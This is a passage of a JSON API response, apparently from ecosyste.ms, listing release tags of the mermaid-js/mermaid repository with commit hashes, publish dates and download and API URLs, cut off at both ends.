mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js